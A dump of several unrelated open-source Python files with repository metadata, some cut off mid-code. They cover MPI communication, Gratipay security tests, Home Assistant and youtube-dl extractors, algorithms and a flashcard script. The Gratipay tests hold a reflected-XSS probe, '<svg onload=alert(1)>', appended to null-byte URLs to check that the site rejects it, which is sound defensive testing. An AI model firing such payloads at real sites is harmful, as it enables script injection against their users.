#!/usr/bin/env python # -*- coding: utf-8 -*- from __future__ import unicode_literals from argparse import ArgumentParser from .core import Core def getopt
(argv): parser = ArgumentParser(description='Another webui for youtube-dl') parser.add_argument('-c', '--config', metavar="CONFIG_FILE", help="config file") parser.add_argument('--host'
, metavar="ADDR", help="the address server listens on") parser.add_argument('--port', metavar="PORT", help="the port server listens on") return vars(parser.parse_args()) def main(argv=None): from os import getpid print("pid is {}".format(getpid())) print("-----------------------------------") cmd_args = getopt(argv) core = Core(cmd_args=cmd_args) core.start()
okuta/chainer
chainermn/communicators/mpi_communicator_base.py
Python
mit
26,362
0
import mpi4py import numpy import chainer import chainer.backends import chainer.utils from chainer.utils import collections_abc from chainermn.communicators import _communication_utility from chainermn.communicators._communication_utility import chunked_bcast_obj from chainermn.communicators import _memory_utility from chainermn.communicators import communicator_base _dtype_mpi_type = { # see the definition of mpi4py.MPI._typedict (in mpi4py/MPI/typemap.pxi) numpy.dtype(numpy.int32): mpi4py.MPI._typedict['i'], numpy.dtype(numpy.int64): mpi4py.MPI._typedict['l'], numpy.dtype(numpy.float16): mpi4py.MPI._typedict['f'], numpy.dtype(numpy.float32): mpi4py.MPI._typedict['f'], numpy.dtype(numpy.float64): mpi4py.MPI._typedict['d'], } def _check_dtype(caller, msgtype): dtype = msgtype.dtype if dtype not in _dtype_mpi_type.keys(): raise TypeError( '{} does not support dtype {}'.format(caller, dtype)) def _check_dtypes_are_same(msgtypes): dtypes = [msgtype.dtype for msgtype in msgtypes] if any(dtypes[0] != dtype for dtype in dtypes): raise TypeError('all dtypes must be the same') def _is_numpy_array(array): return isinstance(array, numpy.ndarray) def _is_cupy_array(array): return chainer.backend.get_array_module(array) is not numpy def _cnt_to_dsp(cnt): """Utility to convert length array to cumulative array.""" return [0] + numpy.cumsum(cnt)[:-1].tolist() def _get_mpi_type(msgtype): dtype = msgtype.dtype if dtype not in _dtype_mpi_type.keys(): raise TypeError( 'dtype {} is not supported by MpiCommunicator'.format(dtype)) return _dtype_mpi_type[dtype] class _MessageType(object): def __init__(self, obj): if _is_numpy_array(obj) or _is_cupy_array(obj): self.is_host = _is_numpy_array(obj) self.is_tuple = False self.narr = 1 self.ndims = [obj.ndim] self.shapes = [obj.shape] self.dtype = obj.dtype elif isinstance(obj, collections_abc.Iterable): if all(map(_is_numpy_array, obj)): self.is_host = True elif all(map(_is_cupy_array, obj)): self.is_host = False else: raise ValueError( 'All message objects must be either numpy or cupy arrays.') self.is_tuple = True self.narr = len(obj) self.ndims = [x.ndim for x in obj] self.shapes = [x.shape for x in obj] dtypes = [x.dtype for x in obj] if not all(dtype == dtypes[0] for dtype in dtypes): raise TypeError( 'Message objects must be the same dtype') self.dtype = dtypes[0] else: raise TypeError( 'Message object must be numpy/cupy array or its tuple.') def get_array_module(self): if self.is_host: return numpy else: import cupy r
eturn cupy class MpiCommunicatorBase(communicator_base.CommunicatorBase): '''MpiCommunicatorBase Implementation of communicator interface defined by :class:`CommunicatorBase`. This communicator assumes MPI4py and all ChainerMN processes are invoked by ``mpirun`` (``mpiexec``) command. Note that several important methods, such as ``multi_node_mean_grad``, are left to be implemented with a specific algorithm. See hiera
rcical communicator or pure_nccl communicator for example. ''' def __init__(self, mpi_comm): self.mpi_comm = mpi_comm self._init_ranks() @property def rank(self): return self.mpi_comm.rank @property def size(self): return self.mpi_comm.size @property def intra_rank(self): return self._intra_rank @property def intra_size(self): return self._intra_size @property def inter_rank(self): return self._inter_rank @property def inter_size(self): return self._inter_size def split(self, color, key): return self.__class__(mpi_comm=self.mpi_comm.Split(color, key)) def alltoall(self, xs): """A primitive of inter-process all-to-all function. This method tries to invoke all-to-all communication within the communicator. All processes in the communicator are expected to invoke ``alltoall()``. This method relies on mpi4py fast communication optimized for numpy arrays, as well as ``send()`` and ``recv()``. If ``xs`` is numpy array, the returned array will also be allocated as numpy array. Additionally, when ``xs`` is cupy array, the returned array will be placed at current device (``https://docs-cupy.chainer.org/en/stable/tutorial/basic.html#current-device``) regardless of which device the argument is placed at remote nodes. Args: xs (tuple of numpy/cupy array) Returns: ys (tuple of numpy/cupy array): Received arrays. The length of tuple equals to the communicator size. """ chainer.utils.experimental( 'chainermn.communicators.MpiCommunicatorBase.alltoall') if len(xs) != self.size: raise ValueError( 'The length of data must be same as communicator size.') # Type check. msgtypes = [_MessageType(x) for x in xs] for msgtype in msgtypes: _check_dtype('alltoall', msgtype) _check_dtypes_are_same(msgtypes) send_msgtype = msgtypes[0] msgtypes = self.mpi_comm.alltoall(msgtypes) _check_dtypes_are_same(msgtypes) recv_msgtype = msgtypes[0] # Collective communication. slens = [x.size for x in xs] xp = chainer.backend.get_array_module(*xs) sbuf = xp.hstack([x.reshape(-1) for x in xs]) shapes = [msgtype.shapes[0] for msgtype in msgtypes] rlens = [chainer.utils.size_of_shape(s) for s in shapes] rbuf = xp.empty([sum(rlens)], dtype=msgtype.dtype) if xp is not numpy: sbuf = _memory_utility.get_device_memory_pointer(sbuf) chainer.cuda.Stream.null.synchronize() self.mpi_comm.Alltoallv( [sbuf, (slens, _cnt_to_dsp(slens)), _get_mpi_type(send_msgtype)], [_memory_utility.get_device_memory_pointer(rbuf), (rlens, _cnt_to_dsp(rlens)), _get_mpi_type(recv_msgtype)]) ys = [rbuf[i:i + l].reshape(s) for i, l, s in zip(_cnt_to_dsp(rlens), rlens, shapes)] return tuple(ys) def send(self, data, dest, tag): """A primitive for inter-process transmitter. This method sends numpy-array to target process. The target process is expected to invoke ``recv()``. This method relies on mpi4py fast communication optimized for numpy arrays, which discards any information attached to chainer.Variable objects. Please be sure. Args: data: data to be sent (tuple, list or raw numpy/cupy array) dest (int): Target process specifier. tag (int): Message ID (MPI feature). """ chainer.utils.experimental( 'chainermn.communicators.MpiCommunicatorBase.send') msgtype = _MessageType(data) _check_dtype('send', msgtype) """We use ssend() instead of send() to pass unittests. If we don't use it, an error occurs in test_point_to_point_communication.py when using MVAPICH2-2.2 and GPUs. """ self.mpi_comm.ssend(msgtype, dest=dest, tag=tag) # Type check. 
if not msgtype.is_tuple: data = [data] for array in data: if numpy.float16 == array.dtype: array = array.astype(numpy.float32) if chainer.backend.get_array_module(array) is not numpy: chainer.cuda.Stream.null.synchronize() array = (_memory_utility.get_device_memory_pointer(array), _get_mpi_type(msgtype)) else:
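The _cnt_to_dsp helper above feeds MPI's Alltoallv, which wants per-rank displacements, i.e. the exclusive prefix sum of the send counts; a quick standalone check (illustrative only):

import numpy

def cnt_to_dsp(cnt):
    # Same as _cnt_to_dsp above: per-rank counts -> starting offsets into the flat buffer.
    return [0] + numpy.cumsum(cnt)[:-1].tolist()

assert cnt_to_dsp([3, 2, 4]) == [0, 3, 5]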
gratipay/gratipay.com
tests/py/test_security.py
Python
mit
5,176
0.002705
from __future__ import absolute_import, division, print_function, unicode_literals import struct import datetime from aspen import Response from aspen.http.request import Request from base64 import urlsafe_b64decode from cryptography.fernet import Fernet, InvalidToken from gratipay import security from gratipay.models.participant import Identity from gratipay.security.crypto import EncryptingPacker from gratipay.testing import Harness from pytest import raises class RejectNullBytesInURI(Harness): def test_filters_path(self): assert self.client.GxT('/f%00/').code == 400 def test_filters_querystring(self): assert self.client.GxT('/', QUERY_STRING='f%00=bar').code == 400 def test_protects_against_reflected_xss(self): self.make_package() assert self.client.GET('/on/npm/foo').code == 200 assert self.client.GxT('/on/npm/foo%00<svg onload=alert(1)>').code == 400 assert self.client.GxT('/on/npm/foo%01<svg onload=alert(1)>').code == 404 # fyi class OnlyAllowCertainMethodsTests(Harness): def test_is_installed_properly(self): assert self.client.hxt('TRaCE', '/').code == 405 def test_allows_certain_methods(self): for allowed in ('GEt', 'HEaD', 'PosT'): request = Request(allowed) assert security.only_allow_certain_methods(request) is None def test_disallows_a_bunch_of_other_stuff(self): for disallowed in ('OPTIONS', 'TRACE', 'TRACK', 'PUT', 'DELETE'): request = Request(disallowed) response = raises(Response, security.only_allow_certain_methods, request).value assert response.code == 405 def test_doesnt_choke_error_handling(self): assert self.client.hit("OPTIONS", "/", raise_immediately=False).code == 405 def test_prevents_csrf_from_choking(self): assert self.client.PxST('/assets/gratipay.css').code == 405 class AddHeadersToResponseTests(Harness): def test_sets_x_frame_options(self): headers = self.client.GET('/about/').headers assert headers['X-Frame-Options'] == 'SAMEORIGIN' def test_sets_x_content_type_options(self): headers = self.client.GET('/about/').headers assert headers['X-Content-Type-Options'] == 'nosniff' def test_sets_x_xss_protection(self): headers = self.client.GET('/about/').headers assert headers['X-XSS-Protection'] == '1; mode=block' def test_sets_referrer_policy(self): headers = self.client.GET('/about/').headers assert headers['Referrer-Policy'] == \ 'no-referrer-when-downgrade, strict-origin-when-cross-origin
' def test_sets_strict_transport_security(self): headers = self.client.GET('/about/').headers assert headers['strict-transport-security'] == 'max-age=31536000
' def test_doesnt_set_content_security_policy_by_default(self): assert 'content-security-policy-report-only' not in self.client.GET('/about/').headers def test_sets_content_security_policy(self): with self.setenv(CSP_REPORT_URI='http://cheese/'): headers = self.client.GET('/about/').headers policy = ( "default-src 'self';" "script-src 'self' assets.gratipay.com 'unsafe-inline';" "style-src 'self' assets.gratipay.com downloads.gratipay.com cloud.typography.com" " 'sha256-WLocK7HeCKzQLS0M+PGS++5IhyfFsOA5N4ZCeTcltoo=';" "img-src *;" "font-src 'self' assets.gratipay.com cloud.typography.com data:;" "block-all-mixed-content;" "report-uri http://cheese/;" ) assert headers['content-security-policy-report-only'] == policy class EncryptingPackerTests(Harness): packed = b'gAAAAABXJMbdriJ984uMCMKfQ5p2UUNHB1vG43K_uJyzUffbu2Uwy0d71kAnqOKJ7Ww_FEQz9Dliw87UpM'\ b'5TdyoJsll5nMAicg==' def test_packs_encryptingly(self): packed = Identity.encrypting_packer.pack({"foo": "bar"}) assert urlsafe_b64decode(packed)[0] == b'\x80' # Fernet version def test_unpacks_decryptingly(self): assert Identity.encrypting_packer.unpack(self.packed) == {"foo": "bar"} def test_fails_to_unpack_old_data_with_a_new_key(self): encrypting_packer = EncryptingPacker(Fernet.generate_key()) raises(InvalidToken, encrypting_packer.unpack, self.packed) def test_can_unpack_if_old_key_is_provided(self): old_key = str(self.client.website.env.crypto_keys) encrypting_packer = EncryptingPacker(Fernet.generate_key(), old_key) assert encrypting_packer.unpack(self.packed) == {"foo": "bar"} def test_leaks_timestamp_derp(self): # https://github.com/pyca/cryptography/issues/2714 timestamp, = struct.unpack(">Q", urlsafe_b64decode(self.packed)[1:9]) # unencrypted! assert datetime.datetime.fromtimestamp(timestamp).year == 2016 def test_demands_bytes(self): raises(TypeError, Identity.encrypting_packer.unpack, buffer('buffer')) raises(TypeError, Identity.encrypting_packer.unpack, 'unicode')
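test_leaks_timestamp_derp above relies on the standard Fernet token layout (a version byte followed by an unencrypted big-endian timestamp); a standalone sketch using only the cryptography library (not Gratipay code):

import struct
from base64 import urlsafe_b64decode
from cryptography.fernet import Fernet

token = Fernet(Fernet.generate_key()).encrypt(b'{"foo": "bar"}')
raw = urlsafe_b64decode(token)
assert raw[0:1] == b'\x80'                  # Fernet version byte
timestamp, = struct.unpack('>Q', raw[1:9])  # creation time, stored in the clear
print(timestamp)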
echopen/PRJ-medtec_sigproc
echopen-leaderboard/bootcamp/leaderboard/urls.py
Python
mit
466
0
# -*- coding: utf-8 -*- from __future__ import unicode_literals from django.shortcuts import render from django.conf.urls i
mport url from .views import HomePageView, LeaderboardView, MiscView, Sign_upView urlpatterns = [ url(r'^$', HomePageView.as_view(), name='home'), url(r'^misc$', Mi
scView.as_view(), name='misc'), url(r'^leaderboard$', LeaderboardView.as_view(), name='leaderboard'), url(r'^login$', Sign_upView.as_view(), name='login'), ]
zlatozar/pytak
pytak/tests/call_test.py
Python
bsd-3-clause
2,316
0.018566
# -*- coding: utf-8 -*- from __future__ import print_function import pytak.call as call import pytak.runners.tools as tools from fakeapi import
CreateTag from fakeapi import GetInformationAboutYourself from fakeapi import CreateAPost new_request_body = { "title" : "New Employee [XXXXX]", "body" : "Please welcome our new employee. Pytak tag - [DDDD]", "type" : "TEXT", "permissions" : { "principal" : { "id" : "12345", "resource" : "http://example.com/schema/1.0/user" }, "permissionFlags" : { "view" : "true", "edit"
: "false", "comment" : "true", "share" : "true", "authorize" :"false" } }, "tags" : [ {"name" : "tag2" }, { "name" : "tag3" }, { "name" : "tag4" } ] } def test_randomize_text(): txt = "JSON value with [XXXX] and [DDDD]" assert txt != call.randomize_text(txt) def test_random_int_leght(): dig = call.__get_random_int(4) assert len(str(dig)) == 4 def test_random_alphanum_leght(): alphnum = call.__get_random_alphanumeric(4) assert len(alphnum) == 4 def test_api_object_request_body_creation(): ct = CreateTag() ct2 = CreateTag(assign={'name':'first'}) assert ct.request_body == ct2.request_body def test_api_object_request_body_manipulation_with_empty(): ct = CreateTag() ct2 = CreateTag(assign={'name':'second'}) tools.form_request_body(ct2) assert ct.request_body != ct2.request_body def test_api_object_request_body_manipulation_with_change(): ct = CreateTag(assign={'name':'one'}) ct2 = CreateTag(assign={'name':'two'}) tools.form_request_body(ct2) assert ct.request_body != ct2.request_body def test_url_rewrite(): your_information = GetInformationAboutYourself() + "fields=id,screenName,fullName" assert your_information.uri == "/api/muad/rest/users/@me?fields=id,screenName,fullName" def test_request_body_rewrite(): CreateAPost() << new_request_body def test_assign_randomization(): create_tag = CreateTag(assign={"name" : "pytak-[XXXX]"}) assert create_tag.assign != {"name" : "pytak-[XXXX]"} def test_request_body_randomization(): create_post = CreateAPost() << new_request_body print(create_post.request_body)
rx2130/Leetcode
python/220 Contains Duplicate III.py
Python
apache-2.0
777
0.001287
class Solution(object): def containsNearbyAlmostDuplicate(self, nums, k, t): """ :type nums: List[int] :type k: int :type t: int :rtype: bool """ if k < 1 or t < 0: return False dic = {} t += 1 for i in range(len(nums)): if i > k: del dic[nums[i - k - 1] // t] m = nums[i] // t if m in dic: return True if m - 1 in dic and abs(nums[i] - dic[m - 1])
< t: return True if m + 1 in dic and abs(nums[i] - dic[m
+ 1]) < t: return True dic[m] = nums[i] return False test = Solution() print(test.containsNearbyAlmostDuplicate([1, 3, 1], 1, 1))
leppa/home-assistant
homeassistant/components/wirelesstag/__init__.py
Python
apache-2.0
9,650
0.000415
"""Support for Wireless Sensor Tags.""" import logging from requests.exceptions import ConnectTimeout, HTTPError import voluptuous as vol from wirelesstagpy import NotificationConfig as NC from homeassistant import util from homeassistant.const import ( ATTR_BATTERY_LEVEL, ATTR_VOLTAGE, CONF_PASSWORD, CONF_USERNAME, ) import homeassistant.helpers.config_validation as cv from homeassistant.helpers.dispatcher import dispatcher_send from homeassistant.helpers.entity import Entity _LOGGER = logging.getLogger(__name__) # Strength of signal in dBm ATTR_TAG_SIGNAL_STRENGTH = "signal_strength" # Indicates if tag is out of range or not ATTR_TAG_OUT_OF_RANGE = "out_of_range" # Number in percents from max power of tag receiver ATTR_TAG_POWER_CONSUMPTION = "power_consumption" NOTIFICATION_ID = "wirelesstag_notification" NOTIFICATION_TITLE = "Wireless Sensor Tag Setup" DOMAIN = "wirelesstag" DEFAULT_ENTITY_NAMESPACE = "wirelesstag" # Template for signal - first parameter is tag_id, # second, tag manager mac address SIGNAL_TAG_UPDATE = "wirelesstag.tag_info_updated_{}_{}" # Template for signal - tag_id, sensor type and # tag manager mac address SIGNAL_BINARY_EVENT_UPDATE = "wirelesstag.binary_event_updated_{}_{}_{}" CONFIG_SCHEMA = vol.Schema( { DOMAIN: vol.Schema( { vol.Required(CONF_USERNAME): cv.string, vol.Required(CONF_PASSWORD): cv.string, } ) }, extra=vol.ALLOW_EXTRA, ) class WirelessTagPlatform: """Principal object to manage all registered in HA tags.""" def __init__(self, hass, api): """Designated initializer for wirelesstags platform.""" self.hass = hass self.api = api self.tags = {} self._local_base_url = None @property def tag_manager_macs(self): """Return list of tag managers mac addresses in user account.""" return self.api.mac_addresses def load_tags(self): """Load tags from remote server.""" self.tags = self.api.load_tags() return self.tags def arm(self, switch): """Arm entity sensor monitoring.""" func_name = f"arm_{switch.sensor_type}" arm_func = getattr(self.api, func_name) if arm_func is not None: arm_func(switch.tag_id, switch.tag_manager_mac) def disarm(self, switch): """Disarm entity sensor monitoring.""" func_name = f"disarm_{switch.sensor_type}" disarm_func = getattr(self.api, func_name) if disarm_func is not None: disarm_func(switch.tag_id, switch.tag_manager_mac) def make_notifications(self, binary_sensors, mac): """Create configurations for push notifications.""" _LOGGER.info("Creating configurations for push notifications.") configs = [] bi_url = self.binary_event_callback_url for bi_sensor in binary_sensors: configs.extend(bi_sensor.event.build_notifications(bi_url, mac)) update_url = self.update_callback_url update_config = NC.make_config_for_update_event(update_url, mac) configs.append(update_config) return configs def install_push_notifications(self, binary_sensors): """Register local push notification from
tag manager.""" _LOGGER.info("Registering local push notifications.") for mac in self.tag_manager_macs: configs = self.make_notifications(binary_sensors, mac) # install notifications for all tags in tag manager # specified by mac result = self.api.inst
all_push_notification(0, configs, True, mac) if not result: self.hass.components.persistent_notification.create( "Error: failed to install local push notifications <br />", title="Wireless Sensor Tag Setup Local Push Notifications", notification_id="wirelesstag_failed_push_notification", ) else: _LOGGER.info( "Installed push notifications for all\ tags in %s.", mac, ) @property def local_base_url(self): """Define base url of hass in local network.""" if self._local_base_url is None: self._local_base_url = "http://{}".format(util.get_local_ip()) port = self.hass.config.api.port if port is not None: self._local_base_url += f":{port}" return self._local_base_url @property def update_callback_url(self): """Return url for local push notifications(update event).""" return f"{self.local_base_url}/api/events/wirelesstag_update_tags" @property def binary_event_callback_url(self): """Return url for local push notifications(binary event).""" return f"{self.local_base_url}/api/events/wirelesstag_binary_event" def handle_update_tags_event(self, event): """Handle push event from wireless tag manager.""" _LOGGER.info("push notification for update arrived: %s", event) try: tag_id = event.data.get("id") mac = event.data.get("mac") dispatcher_send(self.hass, SIGNAL_TAG_UPDATE.format(tag_id, mac), event) except Exception as ex: # pylint: disable=broad-except _LOGGER.error( "Unable to handle tag update event:\ %s error: %s", str(event), str(ex), ) def handle_binary_event(self, event): """Handle push notifications for binary (on/off) events.""" _LOGGER.info("Push notification for binary event arrived: %s", event) try: tag_id = event.data.get("id") event_type = event.data.get("type") mac = event.data.get("mac") dispatcher_send( self.hass, SIGNAL_BINARY_EVENT_UPDATE.format(tag_id, event_type, mac), event, ) except Exception as ex: # pylint: disable=broad-except _LOGGER.error( "Unable to handle tag binary event:\ %s error: %s", str(event), str(ex), ) def setup(hass, config): """Set up the Wireless Sensor Tag component.""" conf = config[DOMAIN] username = conf.get(CONF_USERNAME) password = conf.get(CONF_PASSWORD) try: from wirelesstagpy import WirelessTags, WirelessTagsException wirelesstags = WirelessTags(username=username, password=password) platform = WirelessTagPlatform(hass, wirelesstags) platform.load_tags() hass.data[DOMAIN] = platform except (ConnectTimeout, HTTPError, WirelessTagsException) as ex: _LOGGER.error("Unable to connect to wirelesstag.net service: %s", str(ex)) hass.components.persistent_notification.create( "Error: {}<br />" "Please restart hass after fixing this." "".format(ex), title=NOTIFICATION_TITLE, notification_id=NOTIFICATION_ID, ) return False # listen to custom events hass.bus.listen( "wirelesstag_update_tags", hass.data[DOMAIN].handle_update_tags_event ) hass.bus.listen("wirelesstag_binary_event", hass.data[DOMAIN].handle_binary_event) return True class WirelessTagBaseSensor(Entity): """Base class for HA implementation for Wireless Sensor Tag.""" def __init__(self, api, tag): """Initialize a base sensor for Wireless Sensor Tag platform.""" self._api = api self._tag = tag self._uuid = self._tag.uuid self.tag_id = self._tag.tag_id self.tag_manager_mac = self._tag.tag_manager_mac self._name = self._tag.name self._state = None @property def should_poll(self): """Return the polling state.""" return True @property def name(self): """Return the name of the sensor.""" return self._name @property def principal_value(self): """R
tannmay/Algorithms-1
Sorting/Codes/mergeSort.py
Python
gpl-3.0
1,313
0.007616
''' Python program for implementation of Merge Sort l is left index, m is middle index and r is right index L[l...m] and R[m+1.....r] are respective left and right sub-arrays ''' def merge(arr, l, m, r): n1 = m - l + 1 n2 = r-m #create temporary arrays L = [0]*(n1) R = [0]*(n2) #Copy data to temp arrays L[] and R[] for i in range(0, n1): L[i] = arr[l + i] for j in range(0, n2): R[j] = arr[m+1+j] # Merge the temp array back into arr[l...r] i = 0 # Initial index of first subarray j = 0 # Initial index of second subarray k = l # Initial index of merged subarray #Comparing the elements of the array and filling them into one array while i < n1 and j < n2 : if L[i] <= R[j] : arr[k] = L[i] i += 1 else: arr[k] = R[j] j += 1 k += 1 # Copy the remaining elements of L[], if there are any while i < n1: arr[k] = L[i] i += 1 k += 1 # Copy the remaining elements of R[], if there are any while j < n2: arr[k] = R[j] j += 1 k += 1 # l is for left index and r is for right index of the # subarray of arr to be sorted
def mergeSort(arr, l, r): if l < r
: #Same as (l+r)/2, but avoid overflow for large l and r m = (l+(r-1))//2 # Sort first and second halves mergeSort(arr, l, m) mergeSort(arr, m+1, r) merge(arr, l, m, r)
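A short usage sketch (not part of the original file), sorting a list in place:

arr = [12, 11, 13, 5, 6, 7]
mergeSort(arr, 0, len(arr) - 1)
print(arr)  # [5, 6, 7, 11, 12, 13]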
israeltobias/DownMedia
youtube-dl/youtube_dl/extractor/go.py
Python
gpl-3.0
6,104
0.002457
# coding: utf-8 from __future__ import unicode_literals import re from .adobepass import AdobePassIE from ..utils import ( int_or_none, determine_ext, parse_age_limit, urlencode_postdata, ExtractorError, ) class GoIE(AdobePassIE): _SITE_INFO = { 'abc': { 'brand': '001', 'requestor_id': 'ABC', }, 'freeform': { 'brand': '002', 'requestor_id': 'ABCFamily', }, 'watchdisneychannel': { 'brand': '004', 'requestor_id': 'Disney', }, 'watchdisneyjunior': { 'brand': '008', 'requestor_id': 'DisneyJunior', }, 'watchdisneyxd': { 'brand': '009', 'requestor_id': 'DisneyXD', } } _VALID_URL = r'https?://(?:(?P<sub_domain>%s)\.)?go\.com/(?:[^/]+/)*(?:vdka(?P<id>\w+)|season-\d+/\d+-(?P<display_id>[^/?#]+))' % '|'.join(_SITE_INFO.keys()) _TESTS = [{ 'url': 'http://abc.go.com/shows/castle/video/most-recent/vdka0_g86w5onx', 'info_dict': { 'id': '0_g86w5onx', 'ext': 'mp4', 'title': 'Sneak Peek: Language Arts', 'description': 'md5:7dcdab3b2d17e5217c953256af964e9c', }, 'params': { # m3u8 download 'skip_download': True, }, }, { 'url': 'http://abc.go.com/shows/after-paradise/video/most-recent/vdka3335601', 'only_matching': True, }] def _real_extract(self, url): sub_domain, video_id, display_id = re.match(self._VALID_URL, url).groups() if not video_id: webpage = self._download_webpage(url, display_id) video_id = self._search_regex( # There may be inner quotes, e.g. data-video-id="'VDKA3609139'" # from http://freeform.go.com/shows/shadowhunters/episodes/season-2/1-this-guilty-blood r'data-video-id=["\']*VDKA(\w+)', webpage, 'video id') site_info = self._SITE_INFO[sub_domain] brand = site_info['brand'] video_data = self._download_json( 'http://api.contents.watchabc.go.com/vp2/ws/contents/3000/videos/%s/001/-1/-1/-1/%s/-1/-1.json' % (brand, video_id), video_id)['video'][0] title = video_data['title'] formats = [] for asset in video_data.get('assets', {}).get('asset', []): asset_url = asset.get('value') if not asset_url: continue format_id = asset.get('format') ext = determine_ext(asset_url) if ext == 'm3u8': video_type = video_data.get('type') if video_type == 'lf': data = { 'video_id': video_data['id'], 'video_type': video_type, 'brand': brand, 'device': '001', } if video_data.get('accesslevel') == '1': requestor_id = site_info['requestor_id'] resource = self._get_mvpd_resource( requestor_id, title, video_id, None) auth = self._extract_mvpd_auth( url, video_id, requestor_id, resource) data.update({ 'token': auth, 'token_type': 'ap', 'adobe_requestor_id': requestor_id, }) entitlement = self._download_json( 'https://api.entitlement.watchabc.go.com/vp2/ws-secure/entitlement/2020/authorize.json', video_id, data=urlencode_postdata(data), headers=self.geo_verification_headers()) errors = entitlement.get('errors', {}).get('errors', []) if errors: error_message = ', '.join([error['message'] for error in errors]) raise ExtractorError('%s said: %s' % (self.IE_NAME, error_message), expected=True) asset_url += '?' 
+ entitlement['uplynkData']['sessionKey'] formats.extend(self._extract_m3u8_formats( asset_url, video_id, 'mp4', m3u8_id=format_id or 'hls', fatal=False)) else: formats.append({ 'format_id': format_id, 'url': asset_url, 'ext': ext, }) self._sort_formats(formats) subtitles = {} for cc in video_data.get('closedcaption', {}).get('src', []): cc_url = cc.get('value') if not cc_url: continue ext = determine_ext(cc_url) if ext == 'xml': ext = 'ttml' subtitles.setdefault(cc.get('lang'), []).append({ 'url': cc_url, 'ext': ext, }) thumbnails = [] for thumbnail in video_data.get('thumbnails', {}).get('thumbnail', []): thumbnail_url = thumbnail.get('value') if not thumbnail_url: continue thumbnails.append({ 'url': thumbnail_url, 'width': int_or_none(thumbnail.get('width')), 'height': int_or_none(thumbnail.get('height')), }) return { 'id': video_id, 'title': title, 'description': video_data.get('longdescription') or video_data.get('description'), 'd
uration': int_or_none(video_data.get('duration', {}).get('value'), 1000), 'age_limit': parse_age_limit(video_data.g
et('tvrating', {}).get('rating')), 'episode_number': int_or_none(video_data.get('episodenumber')), 'series': video_data.get('show', {}).get('title'), 'season_number': int_or_none(video_data.get('season', {}).get('num')), 'thumbnails': thumbnails, 'formats': formats, 'subtitles': subtitles, }
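The inner-quote caveat noted in the extractor's comment (data-video-id="'VDKA3609139'") is handled by the ["\']* prefix of the regex; a standalone check:

import re

html = '<div data-video-id="\'VDKA3609139\'">'
match = re.search(r'data-video-id=["\']*VDKA(\w+)', html)
assert match.group(1) == '3609139'  # optional quotes are consumed before VDKA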
jtvaughan/oboeta
oboeta.py
Python
cc0-1.0
6,217
0.009356
#!/usr/bin/env python3 # Review Lines from the Selected Deck in Random Order Until All Pass # Written in 2012 by 伴上段 # # To the extent possible under law, the author(s) have dedicated all copyright # and related and neighboring rights to this software to the public domain # worldwide. This software is distributed without any warranty. # # You should have received a copy of the CC0 Public Domain Dedication along # with this software. If not, see # <http://creativecommons.org/publicdomain/zero/1.0/>. from argparse import * from csv import * from datetime import * from os.path import * from random import * from sys import * def Main(deckfile, logfile, commandfile, field_sep, date_format, is_dry_run, use_sm2): ret = 0 if isinstance(deckfile, str) and not exists(deckfile): stderr.write("deck file does not exist: " + deckfile + "\n") ret = 1 if not exists(logfile): stderr.write("log file does not exist: " + logfile + "\n") ret = 1 if not exists(commandfile): stderr.write("command file (pipe?) does not exist: " + commandfile + "\n") ret = 1 if ret != 0: return 1; reviewing_cards = [] failed_cards = [] deckf = None try: deckf = (open(deckfile, 'r') if isinstance(deckfile, str) else deckfile) for fields in reader(deckf, delimiter=field_sep): if len(fields) != 0: reviewing_cards.append([fields[0], field_sep.join(fields), False]) finally: if deckf is not None: deckf.close() def logreview(logf, card, command): logf.write(card[0] + field_sep + datetime.now().strftime(date_format) + field_sep + command) sm2_commands = set(str(v) + "\n" for v in range(6)) shuffle(reviewing_cards) with open(commandfile, 'r') as commandf: with open(logfile, 'a') as logf: while reviewing_cards or failed_cards: if not reviewing_cards: reviewing_cards, failed_cards = failed_cards, reviewing_cards shuffle(reviewing_cards) card = reviewing_cards.pop() stdout.write(card[1] + "\n") stdout.flush() command = commandf.readline() if use_sm2: if command in sm2_commands: if not (is_dry_run or card[-1]): logreview(logf, card, command) if int(command[0:1]) < 3: card[-1] = True failed_cards.append(card) elif command == "q\n": return 0 else: stderr.write("unrecognized command: " + command + "\n") return 2 else: # Leitner system if command == "+\n": if not (is_dry_run or card[-1]): logreview(logf, card, "+\n") elif command == "-\n": if not is_dry_run: logreview(logf, card, "-\n") card[-1] = True failed_cards.append(card) elif command.lower() == "q\n": return 0 else: stderr.write("unrecognized command: " + command + "\n") return 2 l
ogf.flush() return 0 if __name__ == "__main__": parser = ArgumentParser(formatter_class=Ra
wDescriptionHelpFormatter, description=""" Review lines from standard input as though they were flashcards and log the results. Both standard input and the specified log file must be CSV files with the same field separator character, which is specified via -s. This program works with either the Leitner system or the SuperMemo algorithm, version 2 (SM-2). formatting: This program treats the first field of each nonempty line from the deck as that line's unique ID; otherwise, this program is agnostic about formatting. New log file entries will have this format: <ID> <field-separator> <timestamp> <field-separator> <result> where <ID> is the unique ID of the line (card) associated with the record, <field-separator> is the CSV field separator, <timestamp> is the record's timestamp (you can modify its format via the -f option), and <result> is the result of the review. For Leitner-system-based reviews, <result> is either '+' or '-'. '+' indicates that the user passed the review at the specified time, whereas '-' indicates that the user failed at the specified time. For SM-2-based reviews, <result> is an integer in the range [0,5] indicating the "quality of review response" that the user provided. (0 indicates a complete memory blackout whereas 5 means the review was a piece of cake.) output: This program shuffles lines and prints them to standard output one at a time in CSV format. After printing a card, this program will wait for a command from the specified command file. Commands are single-word lines terminated by standard newline (\\n) characters. For Leitner-system-based reviews, the commands are: + the user passed the card - the user didn't pass the card q the user is terminating the quiz For SM-2-based reviews, the commands are: 0 quality of review response 0 1 quality of review response 1 2 quality of review response 2 3 quality of review response 3 4 quality of review response 4 5 quality of review response 5 q the user is terminating the quiz All other values are erroneous.""") parser.add_argument("-d", "--dry-run", default=False, action="store_true", help="don't log the results of the review") parser.add_argument("-f", "--date-format", default="%Y年%m月%d日", help="the format of dates/timestamps in the log file (uses date/strftime flags, default: %%Y年%%m月%%d日)") parser.add_argument("-s", "--field-sep", default="\t", help="the CSV field separator (default: \\t)") parser.add_argument("-2", "--use-sm2", default=False, action="store_true", help="use the SM-2 algorithm instead of the Leitner system") parser.add_argument("commandfile", help="a file (usually a named pipe) providing review commands") parser.add_argument("logfile", help="a CSV-formatted file containing records for the deck's lines") args = parser.parse_args() try: ret = Main(stdin, args.logfile, args.commandfile, args.field_sep, args.date_format, args.dry_run, args.use_sm2) except KeyboardInterrupt: ret = 0 exit(ret)
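A worked example of the log-record format described in the help text, mirroring logreview above (the card ID is made up; defaults assumed: tab separator, the %Y年%m月%d日 date format):

from datetime import datetime

field_sep = "\t"
date_format = "%Y年%m月%d日"
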